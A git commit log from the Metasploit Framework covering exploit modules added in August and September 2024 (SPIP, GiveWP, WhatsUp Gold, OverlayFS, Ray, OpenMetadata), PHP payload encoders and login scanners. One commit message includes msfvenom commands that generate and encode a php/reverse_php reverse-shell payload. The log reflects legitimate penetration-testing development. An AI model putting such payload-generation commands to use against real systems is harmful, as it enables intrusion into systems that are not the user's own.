jvoisin 4b79889052 Add clang support for live_compile?/upload_and_compile?
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2024-09-09 13:26:24 +02:00
Takah1ro b8f1bc3da2 Update doc 2024-09-09 08:40:08 +09:00
Takah1ro dd932844b6 Remove unused variables 2024-09-09 08:15:08 +09:00
Chocapikk af5c7ecc8f Fix bug 2024-09-08 07:54:11 +02:00
Chocapikk 4f859f129c Fix bug 2024-09-08 07:52:40 +02:00
Chocapikk c75ffb4d43 Update documentation 2024-09-08 07:19:35 +02:00
Chocapikk 59faa1bf0c Change version fingerprinting 2024-09-08 07:01:23 +02:00
Chocapikk 43fabb07e5 Update doc + module + (mixin see #19444) 2024-09-08 06:56:13 +02:00
Chocapikk f8675026ec Update documentation again 2024-09-08 06:32:05 +02:00
Chocapikk 3dfdaea695 (re)fix spip mixin 2024-09-08 06:18:17 +02:00
Chocapikk 9907f94ffc . 2024-09-08 06:05:48 +02:00
Chocapikk 289f47fac1 Update documentation with docker setup, working mixin now, update module 2024-09-08 05:59:11 +02:00
Takah1ro 8ddf8a04ff Remove options 2024-09-07 12:44:37 +09:00
Takah1ro 212c96d195 Add last blank line 2024-09-07 12:29:32 +09:00
Takah1ro 8366252ba2 Not call payload directory 2024-09-07 12:28:40 +09:00
Takah1ro 692531bb87 Call payload directory 2024-09-07 12:16:04 +09:00
Chocapikk cc6127897f Add suggestions 2024-09-07 04:00:25 +02:00
Takah1ro 2b63f8bb88 Rename exploit 2024-09-07 10:29:41 +09:00
Takah1ro 731780ca1a Formatting 2024-09-07 09:21:30 +09:00
Takah1ro 9e832eb483 Use exploit_path variable 2024-09-07 09:19:17 +09:00
Valentin Lobstein 0b768791d6 Update modules/exploits/multi/http/spip_bigup_unauth_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2024-09-07 01:56:21 +02:00
Valentin Lobstein 484cdc940f Update modules/exploits/multi/http/spip_bigup_unauth_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2024-09-07 01:56:09 +02:00
Valentin Lobstein c90f9b1ae5 Update modules/exploits/multi/http/spip_bigup_unauth_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2024-09-07 01:55:54 +02:00
Valentin Lobstein 48f8e248a6 Update documentation/modules/exploit/multi/http/spip_bigup_unauth_rce.md
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2024-09-07 01:49:57 +02:00
Chocapikk 92a25e5a29 Add source (oopsie) 2024-09-07 03:11:49 +02:00
Chocapikk 8b1e1dab1b Add some comments and CVE ID 2024-09-07 03:09:42 +02:00
Chocapikk fdc28080c9 Update disclosure date 2024-09-06 22:14:27 +02:00
Chocapikk 8608e7021d Add spip_bigup_unauth_rce module 2024-09-06 22:10:18 +02:00
Takah1ro fd7321dd3f Strip_comments 2024-09-06 22:58:31 +09:00
Takah1ro 72a9164024 Update pre-compiled binary 2024-09-06 22:29:09 +09:00
Takah1ro b34e807277 Remove unnecessary directory existing check 2024-09-06 22:05:34 +09:00
Takah1ro a40fbb2a7b Remove unnecessary check 2024-09-06 22:04:51 +09:00
Takah1ro d4ac300d73 Fix typo 2024-09-06 21:59:16 +09:00
jvoisin ec8d2f8cc1 Remove an old comment in lib/msf/core/payload/php.rb
The encoder has been implemented in modules/encoders/php/minify.rb
2024-09-06 14:48:45 +02:00
Takahiro Yokoyama ccc4727dfd Update external/source/exploits/CVE-2023-0386/exploit.c
Avoid recursively delete files indiscriminate.

Co-authored-by: bcoles <bcoles@gmail.com>
2024-09-06 21:48:29 +09:00
Takahiro Yokoyama 7a921bbeff Update modules/exploits/linux/local/cve_2023_0386_overlayfs_priv_esc.rb
Use kernel_version.btween

Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2024-09-06 21:45:32 +09:00
Takah1ro cd97b08c62 Move C code to separate file 2024-09-06 21:09:39 +09:00
cgranleese-r7 8e94a0d805 Land #19352, add necessary metadata for bruteforce
add necessary metadata for bruteforce
2024-09-06 10:18:21 +01:00
cgranleese-r7 e377e746e9 Update lib/metasploit/framework/login_scanner/ldap.rb 2024-09-06 10:10:09 +01:00
Takah1ro 1cc562c863 Use mkdir function 2024-09-06 12:55:51 +09:00
Takah1ro 920ef70105 Exploit dir existing check 2024-09-06 12:53:18 +09:00
Takahiro Yokoyama b243b86157 Update modules/exploits/linux/local/cve_2023_0386_overlayfs_priv_esc.rb
use linux/x64/meterpreter_reverse_tcp

Co-authored-by: Brendan <bwatters@rapid7.com>
2024-09-06 08:51:20 +09:00
Takah1ro dc81711301 Make timeout user configurable 2024-09-06 08:24:14 +09:00
Metasploit fa8c80f430 automatic module_metadata_base.json update 2024-09-05 13:17:29 -05:00
Jack Heysel 93ddceb929 Land #19419, Remove unneeded code in php/base64
This remove some useless code in modules/encoders/php/base64.rb
2024-09-05 11:00:56 -07:00
Metasploit 1ffb0b16cb automatic module_metadata_base.json update 2024-09-05 11:57:37 -05:00
Jack Heysel 9fad484029 Land #19439, Update bypassuac_comhijack supported arch
This explicitly defines x86 and x64 as supported architectures for the
bypassuac_comhijack module. Prior to this change there were no defined
architectures and if you tried to use an x64 based payload the module
would fail.
2024-09-05 09:41:41 -07:00
Metasploit 3e82156200 automatic module_metadata_base.json update 2024-09-05 11:33:13 -05:00
Jack Heysel 152710403d Land #19330, Add SSL opt in start_service
The start_service method now allows users to specify their SSL
preferences directly through the opts parameter. If the ssl option is
not provided in opts, it will default to the value in datastore["SSL"]
2024-09-05 09:08:07 -07:00
Jack Heysel 434593dcb4 Suggestion and rubocop fixes 2024-09-05 08:49:32 -07:00
Takah1ro afb8c6c27c Strip comments 2024-09-05 23:13:08 +09:00
Takah1ro 216590f84a Add last blank line 2024-09-05 23:00:06 +09:00
Takah1ro 3d20dd6ddf Add module:
Linux Priv Esc (OverlayFS copying bug) CVE-2023-0386
2024-09-05 22:54:55 +09:00
Metasploit 6f1acf4610 Bump version of framework to 6.4.26 2024-09-05 03:38:07 -05:00
Metasploit 72f4dcb529 automatic module_metadata_base.json update 2024-09-04 17:13:06 -05:00
Jack Heysel 4712bb4db5 Land #19435, Add php minify encoder
This encoder minifies PHP payloads by removing spaces after keywords and
before block openings. It removes comments, empty lines, new lines and
leading and trailing spaces
2024-09-04 14:47:24 -07:00
Jack Heysel 05c3c9ac65 Updated reliability comment 2024-09-04 14:09:04 -07:00
Jack Heysel 2da95ebc6a Remove SLEEP datastore option 2024-09-04 13:39:01 -07:00
Chocapikk 37042d837e Add spip_plugin_version function to retrieve plugin version from config.txt or Composed-By header 2024-09-04 22:17:06 +02:00
Chocapikk b8a1d40f46 Rename execute_command to send_payload in line with its actual function (avoiding confusion with cmdstager) 2024-09-04 21:14:39 +02:00
Chocapikk 8024533ab4 More readable check functions 2024-09-04 21:09:49 +02:00
sjanusz-r7 10dee226c6 Replace Readline with Reline 2024-09-04 16:39:41 +01:00
bcoles b1ec86ebc5 bypassuac_comhijack: Specify x86/x64 as supported payload architectures 2024-09-04 23:49:33 +10:00
Chocapikk 7458a2dba3 Remove useless documentation 2024-09-03 20:29:45 +02:00
dwelch-r7 5f65ce21c6 Land #19438, Fixes a nil error if login is successful with ldap_login module 2024-09-03 14:54:47 +01:00
cgranleese-r7 242d91ee72 Fixes ldap_login nil error when login is successful 2024-09-03 14:00:26 +01:00
h4x-x0r 75627ccba7 Update whatsup_gold_sqli.rb 2024-09-02 15:45:45 +01:00
h4x-x0r fdd740b235 cleanup
cleanup
2024-09-02 15:44:27 +01:00
h4x-x0r 64f595c431 cleanup, version check, documentation
cleanup, version check, documentation
2024-09-02 15:41:08 +01:00
h4x-x0r 686da13ff5 WhatsUp Gold SQL Injection (CVE-2024-6670)
WhatsUp Gold SQL Injection (CVE-2024-6670)
2024-09-02 16:09:10 +01:00
h4x-x0r c82b8217a8 CVE-2024-6670
CVE-2024-6670
2024-09-01 23:26:11 +01:00
jvoisin 5b94c7e2d4 Add an encoder to minify php payloads
```console
$ ./msfvenom --platform php -a php -p php/reverse_php | ./msfvenom -e php/base64 --platform php -a php | php -l
Attempting to read payload from STDIN...
No encoder specified, outputting raw payload
Payload size: 3010 bytes
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 4052 (iteration=0)
php/base64 chosen with final size 4052
Payload size: 4052 bytes

No syntax errors detected in Standard input code
$ ./msfvenom --platform php -a php -p php/reverse_php -e php/minify | ./msfvenom -e php/base64 --platform php -a php | php -l
Attempting to read payload from STDIN...
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/minify
php/minify succeeded with size 2109 (iteration=0)
php/minify chosen with final size 2109
Payload size: 2109 bytes

Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 2839 (iteration=0)
php/base64 chosen with final size 2839
Payload size: 2839 bytes

No syntax errors detected in Standard input code
$
```
2024-09-01 23:09:47 +02:00
gardnerapp d676bedc0f Update modules/exploits/osx/local/persistence.rb
Co-authored-by: dwelch-r7 <Dean_Welch@rapid7.com>
2024-08-30 18:25:02 -04:00
Chocapikk 36621c05d9 del documentation/modules/exploit/unix/webapp/spip_rce_form.md 2024-08-30 22:22:41 +02:00
Chocapikk 28ac6f5e07 add CheckCode:Safe 2024-08-30 21:58:30 +02:00
Jack Heysel 9ad5b41064 Rubocop 2024-08-30 12:56:10 -07:00
Chocapikk 4994ebbef5 fix: right versions in spip_porte_plume_previsu.rb 2024-08-30 21:53:47 +02:00
Jack Heysel 7bfd814297 Removed memory polling 2024-08-30 12:52:18 -07:00
Chocapikk effbfac806 fix: right versions in spip_rce_form.rb .... 2024-08-30 21:50:11 +02:00
Chocapikk 53f0bc398c fix: correct version handling error in SPIP check 2024-08-30 21:46:35 +02:00
Chocapikk 586cf482ce Refactoring SPIP Modules for Windows Compatibility and Incorporating SPIP Mixin 2024-08-30 20:37:32 +02:00
Metasploit db55e5e8fd automatic module_metadata_base.json update 2024-08-30 10:52:23 -05:00
Jack Heysel f951f250f8 Land #19381, Fix gitlab_login scanner
This fixes the gitlab_login scanner so that it uses the proper datastore
options Username and Password which are the standard for login scanners.
Before this fix the scanner was using HttpUsername and HttpPassword and
ignoring the datastore options Username and Password
2024-08-30 08:36:08 -07:00
Metasploit b77b64069a automatic module_metadata_base.json update 2024-08-30 07:23:35 -05:00
dwelch-r7 05cfe7c795 Land #19401, Add a mixin to get SPIP version and make use of it 2024-08-30 13:07:02 +01:00
Dean Welch d86e85aeea Remove whitespace from spip version regex 2024-08-30 11:42:55 +01:00
Dean Welch 6532107eb4 Remove whitespace from spip version regex 2024-08-30 11:33:15 +01:00
Jack Heysel b011b67f80 Responded to comments 2024-08-29 22:25:20 -07:00
Adithya Chiluka 4a0d3d4598 Update README.md
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
2024-08-30 06:30:31 +05:30
Adithya Chiluka a37c3bcd4b Update README.md
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
2024-08-30 06:30:20 +05:30
Adithya Chiluka 51bd4fd8ac Update README.md
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
2024-08-30 06:29:59 +05:30
Jack Heysel b32234382e Add correct missing file 2024-08-29 18:53:39 -04:00
Metasploit bd681f89c9 automatic module_metadata_base.json update 2024-08-29 16:33:25 -05:00
bwatters fa734b5a56 Land #19368, Geoserver enhancement
Merge branch 'land-19368' into upstream-master
2024-08-29 16:07:48 -05:00
bwatters be4900f06d Rebase and readd documentation/modules/exploit/linux/http/openmetadata_auth_bypass_rce.md 2024-08-29 11:25:13 -05:00
h00die-gr3y 6b640d0506 some small final changes 2024-08-29 11:23:58 -05:00
h00die-gr3y bad1c33dd3 removed openmetadata files accidently added 2024-08-29 11:23:58 -05:00
h00die-gr3y 003769f1d7 Added POC reference 2024-08-29 11:23:58 -05:00
h00die-gr3y 1d60705516 dynamic feature type enhancement 2024-08-29 11:23:58 -05:00
h4x-x0r 64123ab599 placeholder for CVE-2024-43425
placeholder for CVE-2024-43425
2024-08-29 17:17:10 +01:00
Jack Heysel e40f6cb785 Add missing file 2024-08-29 08:38:08 -04:00
h4x-x0r a39c4076e4 cleanup
cleanup
2024-08-29 13:36:54 +01:00
cgranleese-r7 6b49eb381d Land #19429, Update framework dependencies 2024-08-29 10:52:34 +01:00
adfoster-r7 e796c6a3a1 Update framework dependencies 2024-08-29 10:27:17 +01:00
Metasploit b9bbfa6567 Bump version of framework to 6.4.25 2024-08-29 03:34:28 -05:00
Metasploit 30dd3774d8 automatic module_metadata_base.json update 2024-08-28 18:59:07 -05:00
bwatters 6b83f09312 Land #19421, Updates to adobe_pdf_embedded_exe
Merge branch 'land-19421' into upstream-master
2024-08-28 18:40:55 -05:00
bwatters 87fbba3426 Land #19405, Minor improvements to lib/msf/core/post/linux/kernel.rb
Merge branch 'land-19405' into upstream-master
2024-08-28 16:55:14 -05:00
Metasploit dd3b9317dc automatic module_metadata_base.json update 2024-08-28 15:39:04 -05:00
Spencer McIntyre 0b0f9cdce9 Land #19409, Add additional Linux VM fingerprints
Improve a bit modules/post/linux/gather/checkvm.rb
2024-08-28 16:10:54 -04:00
adfoster-r7 84ffa524e5 Land #19424, WordPress GiveWP Plugin RCE 2024-08-28 21:09:42 +01:00
adfoster-r7 71ee987079 Add additional documentation steps, and use 0 for the payload http timeout 2024-08-28 19:21:27 +01:00
Metasploit 3bab5277bc automatic module_metadata_base.json update 2024-08-28 13:11:08 -05:00
adfoster-r7 fabb5d1f78 Land #19422, pgAdmin 8.4 RCE / CVE-2024-3116 2024-08-28 18:54:53 +01:00
adfoster-r7 aaf95f9134 Apply suggestions from code review 2024-08-28 18:46:08 +01:00
Chocapikk 9eb630d993 Add credit 2024-08-28 19:20:32 +02:00
Chocapikk 6bec3d2db0 Lint 2024-08-28 19:16:26 +02:00
igomeow d0d4c3083a Fixing error message 2024-08-28 18:33:31 +02:00
igomeow 2b7cf76fc8 Fixing wrong SideEffects and Reliability values 2024-08-28 18:20:20 +02:00
igomeow 251c1c0c1e Adding check for host operating system 2024-08-28 18:17:36 +02:00
Metasploit ab4bc033d6 automatic module_metadata_base.json update 2024-08-28 11:04:51 -05:00
Spencer McIntyre 2aea8b4ef7 Land #19420, Add modules/encoders/php/hex.rb 2024-08-28 11:49:00 -04:00
jvoisin 2c79c3d02f Add a mixin to get SPIP version and make use of it 2024-08-28 17:17:53 +02:00
Spencer McIntyre a22db071f0 Appease rubocop 2024-08-28 10:46:48 -04:00
h4x-x0r 018b041335 cleanup
cleanup
2024-08-28 15:40:35 +01:00
Valentin Lobstein 2900d45e9f Update documentation/modules/exploit/multi/http/wp_givewp_rce.md
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2024-08-28 13:00:32 +02:00
Valentin Lobstein 57343d3bc4 Update modules/exploits/multi/http/wp_givewp_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2024-08-28 13:00:20 +02:00
jvoisin 24750deab3 Add modules/encoders/php/hex.rb
This one increases the size of the payload by a bit more than a factor two,
but should be able to generate a valid encoded payload in some pathological
BADCHAR situations where modules/encoders/php/base64.rb can't.
2024-08-28 12:19:04 +02:00
Metasploit 370f0f4e13 automatic module_metadata_base.json update 2024-08-27 16:33:43 -05:00
bwatters 02eb49ed00 Land #19395, Electerm post password gather module
Merge branch 'land-19395' into upstream-master
2024-08-27 16:17:45 -05:00
Chocapikk 06a9583cfd Fix typo 2024-08-27 22:16:11 +02:00
Chocapikk 1d7cffbdac Refactored exploit module based on RCESecurity's analysis of CVE-2024-5932
- Completely overhauled the method for exploiting the GiveWP plugin by removing dependency on the REST API, which may require authentication.
- Instead, we now use the admin-ajax.php endpoint for retrieving form lists and nonce values, ensuring compatibility even when REST API authentication is required.
- The exploit now works with all form types; however, the give_price_id and give_amount must be set to '0' and '0.00', respectively, as attempts to randomize these values caused the exploit to fail.
2024-08-27 22:15:12 +02:00
Metasploit fd66ab72ed automatic module_metadata_base.json update 2024-08-27 14:44:06 -05:00
Jack Heysel 8bf354cad2 Land #19417, Improve wp_backup_migration_php exploit
The new PHP filter chain evaluates a POST parameter, which simplifies
the process and reduces the payload size enabling the module to send the
entire paylaod in one POST request instead of writing the payload to a
file character by character over many POST requests. Support for both
Windows and Linux Meterpreter payloads, not just PHP Meterpreter, has
also been added.
2024-08-27 15:17:00 -04:00
Chocapikk 7f37731396 Lint 2024-08-27 21:14:35 +02:00
Chocapikk 80c784f0e8 Update detail about payloads 2024-08-27 21:07:18 +02:00
Chocapikk 23cd137fbd Update module 2024-08-27 20:28:44 +02:00
Chocapikk d249711480 Update doc 2024-08-27 20:27:46 +02:00
jheysel-r7 61fa0c40b8 Update documentation/modules/exploit/multi/http/wp_backup_migration_php_filter.md 2024-08-27 14:14:28 -04:00
Chocapikk bc7840ea7f Add wp_givewp_rce exploit module 2024-08-27 19:50:35 +02:00
Metasploit f783aab9a3 automatic module_metadata_base.json update 2024-08-27 12:06:04 -05:00
bwatters 6c24e0a952 Land #19393, Update OFBiz ProgramExport RCE for Patch Bypass
Merge branch 'land-19393' into upstream-master
2024-08-27 11:48:38 -05:00
adfoster-r7 2711acf657 Land #19423, Rename acceptance.yml in preparation for another PR 2024-08-27 16:21:37 +01:00
cgranleese-r7 f3d7abd54d Renames acceptance.yml in preperation for another PR 2024-08-27 16:10:01 +01:00
Metasploit fef929aafc automatic module_metadata_base.json update 2024-08-27 10:03:07 -05:00
bwatters 4af2294709 Land #19386, Ivanti Virtual Traffic Manager (vTM) Authentication Bypass (CVE-2024-7593) Module
Merge branch 'land-19386' into upstream-master
2024-08-27 09:39:10 -05:00
Jack Heysel 49d382692a Land #19377, Add compressinon to php/base64
This enables users to set a datastore option in enocoders/php/base64
which will compress the payload using zlib, greatly reducing its size
2024-08-27 10:27:45 -04:00
Simon Janusz 3ad24b45e3 Land #19241, Remove uri unescape usage 2024-08-27 15:22:43 +01:00
cgranleese-r7 fa80ced9a7 Land #19412, Update rexml 2024-08-27 13:12:43 +01:00
Metasploit 322b09e503 automatic module_metadata_base.json update 2024-08-26 18:45:32 -05:00
bwatters f74b7ccef5 Land #19415, Update the ldap_esc_vulnerable_cert_finder module
Merge branch 'land-19415' into upstream-master
2024-08-26 18:28:33 -05:00
Metasploit 2e0a73823e automatic module_metadata_base.json update 2024-08-26 18:26:17 -05:00
bwatters 84431b0a4e Land #19380, Control iD iDSecure Authentication Bypass (CVE-2023-6329) Module
Merge branch 'land-19380' into upstream-master
2024-08-26 18:09:09 -05:00
igomeow 6326cac8d4 Fixing nil safe issue 2024-08-26 23:23:43 +02:00
igomeow 7e9f52dd0b Github release 2024-08-26 23:02:53 +02:00
Spencer McIntyre db7dc6596f Fix rubocop complaints 2024-08-26 16:59:04 -04:00
jheysel-r7 573643a7b4 Update modules/encoders/php/base64.rb 2024-08-26 16:35:29 -04:00
Metasploit def7f5a823 automatic module_metadata_base.json update 2024-08-26 15:34:20 -05:00
Spencer McIntyre b61e6b1cc2 Add ARCH_X64 and test it, refactor to drop EXENAME 2024-08-26 16:25:03 -04:00
jvoisin 656c8fd4fb Remove some useless code in modules/encoders/php/base64.rb
The payload is always quoted since 975de9d479, so
there is no need to care if the first character is alpha or not.
This has some chance to make the payload 5 chars smaller, woo!
2024-08-26 22:21:27 +02:00
Jack Heysel e0037fb167 Land #19376, Fix php/base64 encoder
This fixes the php/base64 encoder which was previously generating php
payloads that were failing when being being run
2024-08-26 16:08:03 -04:00
igomeow b3605bd951 Documentation 2024-08-26 19:59:17 +02:00
igomeow d1ce041fd0 Inital commit and Rubocop fixes 2024-08-26 19:27:20 +02:00
Chocapikk c32c1e3a66 Update doc 2024-08-24 17:31:09 +02:00
Chocapikk 05b1837e7b Random parameter generation 2024-08-24 17:27:13 +02:00
Chocapikk 4ee30b24cb Rewrite wp_backup_migration_php_filter 2024-08-24 17:16:58 +02:00
h4x-x0r 6532255600 PoC & Documentation
PoC & Documentation
2024-08-23 23:21:49 +01:00
Spencer McIntyre 4cfa93f878 Update the ldap_esc_vulnerable_cert_finder module 2024-08-23 16:49:30 -04:00
cgranleese-r7 e7dccc0803 Land #19408, Disable mssql tests for now 2024-08-23 14:26:13 +01:00
Christophe De La Fuente 19e3f29441 Add missing constants for the Kerberos login scanner & set default server_name value in the client 2024-08-23 15:01:18 +02:00
adfoster-r7 82f1c2f61c Update rexml 2024-08-23 13:17:32 +01:00
adfoster-r7 fb4fde823d Land #19411, Fix RPC: check result is not nil before getting length 2024-08-23 11:28:54 +01:00
Metasploit 2452fd57bb automatic module_metadata_base.json update 2024-08-23 04:26:17 -05:00
dledda-r7 9521563e8d fix(rpc): check result is not nil before getting length 2024-08-23 05:25:59 -04:00
dledda-r7 ec5892ff1f Land #19363, Ray Modules CVE-2023-6019 CVE-2023-6020 CVE-2023-48022 2024-08-23 04:55:17 -04:00
jvoisin debb01062d Improve a bit modules/post/linux/gather/checkvm.rb
Based on some old notes that I never bothered to upstream into metasploit.
2024-08-22 23:19:09 +02:00
adfoster-r7 c146d23ec1 Disable mssql tests for now 2024-08-22 22:06:59 +01:00
Jack Heysel f6378913c3 Merge branch 'win-kernel-lpe-cve-2024-30038' of github.com:jheysel-r7/metasploit-framework into win-kernel-lpe-cve-2024-30038 2024-08-22 13:07:30 -07:00
Jack Heysel 6689614d8f Responded to comments 2024-08-22 13:06:29 -07:00
三米前有蕉皮 ea6efff830 Update modules/post/multi/gather/electerm.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2024-08-22 22:28:01 +08:00
三米前有蕉皮 c37b697b99 Update documentation/modules/post/multi/gather/electerm.md
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2024-08-22 22:27:51 +08:00
jvoisin f5145dee35 Minor improvements to lib/msf/core/post/linux/kernel.rb
1. Add a couple of missing architectures
2. Use `read_file` instead of `cmd_exec + cat`
2. Use File.… instead of `cmd_exec` and `test`
2024-08-22 11:34:22 +02:00
Metasploit 1a35492634 Bump version of framework to 6.4.24 2024-08-22 03:38:31 -05:00
jheysel-r7 bde9fca9e4 Apply suggestions from code review 2024-08-22 02:35:21 -04:00
Jack Heysel 31348dac33 Windows LPE CVE-2024-30088 2024-08-21 23:16:37 -07:00
adfoster-r7 0df07d7693 Land #19390, Adds support to test custom payload branches 2024-08-21 17:06:21 +01:00
Metasploit 2dd06c3264 automatic module_metadata_base.json update 2024-08-21 09:03:13 -05:00
cgranleese-r7 63ac22950f Adds support to test custom payload branches 2024-08-21 15:02:19 +01:00
dledda-r7 35da4662ed Land #19351, DIAEnergie SQL Injection 2024-08-21 09:44:15 -04:00
Takah1ro 39f81e0a45 Update check function 2024-08-21 22:32:53 +09:00
Metasploit facd583630 automatic module_metadata_base.json update 2024-08-21 08:15:03 -05:00
Takah1ro ee58313d64 Update check function 2024-08-21 22:09:56 +09:00
dwelch-r7 f3a220518a Land #19394, SPIP Unauthenticated RCE Exploit 2024-08-21 13:58:26 +01:00
Takahiro Yokoyama c66540ef2f Update modules/exploits/linux/http/ray_agent_job_rce.rb
use MeterpreterTryToFork to avoid a meterpreter session get killed

Co-authored-by: Diego Ledda <diego_ledda@rapid7.com>
2024-08-21 21:38:37 +09:00
Metasploit 1a732158c0 automatic module_metadata_base.json update 2024-08-21 04:50:31 -05:00
dwelch-r7 8d838d4d56 Land #19366, Jenkins Login Scanner improvments 2024-08-21 10:28:22 +01:00
Chocapikk 62ab17b14d Update documentation and Docker Compose for SPIP, remove Rex.sleep() in Metasploit module due to stable payload. 2024-08-20 19:41:05 +02:00
Valentin Lobstein fdbf7dd3ef Update modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2024-08-20 18:54:03 +02:00
Takah1ro 91167fc85f Remove unnecessary option 2024-08-20 21:44:11 +09:00
Takah1ro 4d1782640b Update sideeffects 2024-08-20 19:12:18 +09:00
Takah1ro 01b2a1c55c Enable fetch payload 2024-08-20 13:20:42 +09:00
Takah1ro 45677898a8 Add TARGET_URI 2024-08-20 13:08:01 +09:00
Takah1ro 52852cea72 Add cve ref 2024-08-20 12:59:52 +09:00
h00die c8084e4504 Create vcenter_sudo_lpe.rb 2024-08-19 20:02:05 -04:00
Takah1ro 99c81d7821 Set default fetch_command to wget 2024-08-20 08:59:39 +09:00
Takah1ro 64bdf54bb0 Use Fetch Payload (Not tested) 2024-08-20 08:56:05 +09:00
Takah1ro a5b9d553fa Update check to use version info 2024-08-20 08:25:27 +09:00
Takah1ro 5be7e09ff0 Update check to use version info 2024-08-20 08:21:48 +09:00
Takah1ro 17ea7d2b72 Remove explicit return 2024-08-20 08:15:16 +09:00
Takah1ro 1232080340 Update lfi module 2024-08-20 08:09:12 +09:00
Takahiro Yokoyama f902ae84fe Update modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb
Avoid check method being controlled by the 'FILEPATH' content

Co-authored-by: Diego Ledda <diego_ledda@rapid7.com>
2024-08-20 07:45:38 +09:00
h4x-x0r e30232d2ca CVE-2024-31214 & CVE-2024-24809
CVE-2024-31214 & CVE-2024-24809
2024-08-19 23:03:36 +01:00
h4x-x0r 362b2427dc Error handling and code cleanup
Error handling and code cleanup
2024-08-19 22:47:19 +01:00
h4x-x0r 3f3690bebb code cleanup
code cleanup
2024-08-19 21:17:16 +01:00
Chocapikk 334a9bafa9 Use encoder/php/base64 2024-08-19 18:26:19 +02:00
Chocapikk 3d00f819c6 Update 2024-08-20 07:04:30 +02:00
Chocapikk b0f3bf1576 Add credit 2024-08-20 07:02:59 +02:00
Chocapikk c7d20853d6 Update documentation 2024-08-19 19:51:36 +02:00
Chocapikk eaf5661896 Lint 2024-08-19 19:27:29 +02:00
h4x-x0r 9690f01df6 code cleanup
code cleanup
2024-08-19 16:25:50 +01:00
Metasploit d6a03b29bb automatic module_metadata_base.json update 2024-08-19 03:40:02 -05:00
dledda-r7 afd0f1974b Land #19373, Fortra FileCatalyst Workflow SQL Injection 2024-08-19 04:10:58 -04:00
Valentin Lobstein f65ccbec73 Update modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2024-08-18 21:23:59 +02:00
Valentin Lobstein 6ad0b56099 Update modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2024-08-18 21:22:16 +02:00
Valentin Lobstein 718c215b96 Update modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2024-08-18 21:22:09 +02:00
cn-kali-team d5fbfaf775 set the default type to ssh 2024-08-18 16:53:09 +08:00
cn-kali-team cd21e57576 fix window appdata path 2024-08-18 16:45:36 +08:00
jheysel-r7 c982aabaa3 Minor update 2024-08-16 12:17:56 -07:00
cn-kali-team 57a327a9f4 doc 2024-08-16 23:40:04 +08:00
h4x-x0r 82f51bb9b7 code cleanup
code cleanup
2024-08-16 15:43:34 +01:00
h4x-x0r 5a94869809 cleanup
cleanup
2024-08-16 14:12:41 +01:00
h4x-x0r 3577ae8ffb Code cleanup
Code cleanup
2024-08-16 13:57:38 +01:00
cn-kali-team c4c58e466d doc 2024-08-16 20:07:16 +08:00
cn-kali-team 1127225363 electerm 2024-08-16 20:04:57 +08:00
Chocapikk 3d90eb0f43 Add spip_porte_plume_previsu_rce 2024-08-16 10:50:23 +02:00
h4x-x0r 8ad328a510 Code cleanup
Code cleanup
2024-08-16 07:07:16 +01:00
Takah1ro 209f172aa1 Update document 2024-08-16 08:56:01 +09:00
Takah1ro 7258ca4fb1 Remove unnecessary option for simplicity 2024-08-16 08:49:34 +09:00
Takah1ro eeab7ce2a2 Proceed when user specified cmd fails 2024-08-16 08:23:50 +09:00
jheysel-r7 ea10360c81 Update OFBiz ProgramExport RCE for Patch Bypass 2024-08-15 09:18:15 -07:00
Metasploit e4726e4f52 Bump version of framework to 6.4.23 2024-08-15 03:40:21 -05:00
Takah1ro ea1b9e925e Delete old three exploits in one module 2024-08-15 08:17:36 +09:00
h4x-x0r 947cefe43a Fixed get_cookies
Fixed get_cookies
2024-08-14 17:42:11 +01:00
h4x-x0r 765e9b9ae4 Improved error handling
Improved error handling
2024-08-14 17:25:36 +01:00
Metasploit 5e11dee27e automatic module_metadata_base.json update 2024-08-14 10:22:19 -05:00
cgranleese-r7 dbc51d1cd4 Land #19347, OpenMetadata authentication bypass and SpEL injection exploit chain[CVE-2024-28255 and CVE-2024-28254] 2024-08-14 16:06:10 +01:00
Metasploit 4e2dda3562 automatic module_metadata_base.json update 2024-08-14 09:42:31 -05:00
dledda-r7 f211fcb6a6 Land #19370, LG Simple Editor Command Injection 2024-08-14 10:22:29 -04:00
Metasploit 024af65c2a automatic module_metadata_base.json update 2024-08-14 04:30:49 -05:00
cgranleese-r7 36322ff274 Land #19348, Apache HugeGraph Gremlin RCE (CVE-2024-27348) 2024-08-14 10:06:21 +01:00
h4x-x0r ea2b5920ac cleanup
cleanup
2024-08-14 06:44:43 +01:00
h4x-x0r 9c72a85134 Verified more versions
Verified exploit against more affected versions
2024-08-14 06:33:45 +01:00
h4x-x0r 75201b0892 Updated references
references, affected versions, credits
2024-08-14 05:15:36 +01:00
h4x-x0r 7bfc386973 Updated
added error handling, documentation, version check, store_valid_credential
2024-08-14 04:57:08 +01:00
h4x-x0r be62cc97a7 Auth Bypass
Auth Bypass
2024-08-14 02:00:06 +01:00
h4x-x0r 17149db5a3 code cleanup
code cleanup
2024-08-13 23:23:35 +01:00
h4x-x0r b96bc116f5 Code cleanup
